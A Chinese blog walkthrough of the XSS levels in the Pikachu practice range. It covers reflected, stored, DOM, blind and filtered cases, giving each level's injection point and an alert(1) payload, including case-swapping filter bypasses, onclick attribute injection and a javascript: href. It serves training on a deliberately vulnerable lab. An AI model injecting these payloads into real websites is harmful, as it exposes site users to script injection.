pikachu靶场通关-Cross-Site Scripting(XSS)

Cross-Site Scripting

反射型xss(get)

  • 输出点

    image-20230205230808928

  • 构造payload

    发现输入框限制了长度,通过F12修改maxlength属性

    <script>alert(1)</script>
    

    image-20230205231024933

反射性xss(post)

  • 输出点

    这里需要先登录,我也是看了半天才看见提示的 admin 123456

    image-20230205231449387

  • 构造payload

    <script>alert(1)</script>
    

    image-20230205231641240

存储型xss

  • 输出点

    image-20230205231628472

  • 构造payload

    <script>alert(1)</script>
    

    image-20230205231646461

DOM型xss

  • 输出点

    image-20230205231752087

  • 构造payload

    #' οnclick='alert(1)
    

    image-20230205231934377

DOM型xss-x

  • 输出点

    这里输入后要先点击一下”有些费尽心机想要忘记的事情,后来真的就忘掉了”这句话

    image-20230205232227798

  • 构造payload

    a' οnclick='alert(1) 
    

    image-20230205232341603

xss盲打

  • 输出点

    根据提示来到/xssblind/admin_login.php目录下 使用前面关卡的账户密码登录 admin 123456

    登录后发现我们刚才写的留言和内容会显示在页面上

    image-20230205232758704

    image-20230205232835459

  • 构造payload

    输入payload后刷新/xssblind/admin_login.php页面会发现注入成功

    <script>alert(1)</script>
    

    image-20230205232954915

xss之过滤

  • 输出点

    image-20230205233041304

  • 构造payload

    会发现有很多标签都被过滤,使用大小写绕过

    <sCript>alert(1)</scrIpt>
    

    image-20230205233254578

xss之htmlspecialchars

  • 输出点

    htmlspecialchars()是把预定义的字符转换为 HTML 实体。

    image-20230205233437754

  • 构造payload

    1' onclick='alert(1)
    

    image-20230205233519928

xss之href输出

  • 输出点

    image-20230205233550665

  • 构造payload

    javascript:alert(1)
    

    image-20230205233858223

xss之js输出

  • 输出点

    查看页面源代码,可以发现我们输入的值被放在了<script>标签中,可以对此进行利用

    image-20230205234601748

  • 构造payload

    1';alert(1);'
    

    image-20230205234717469

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值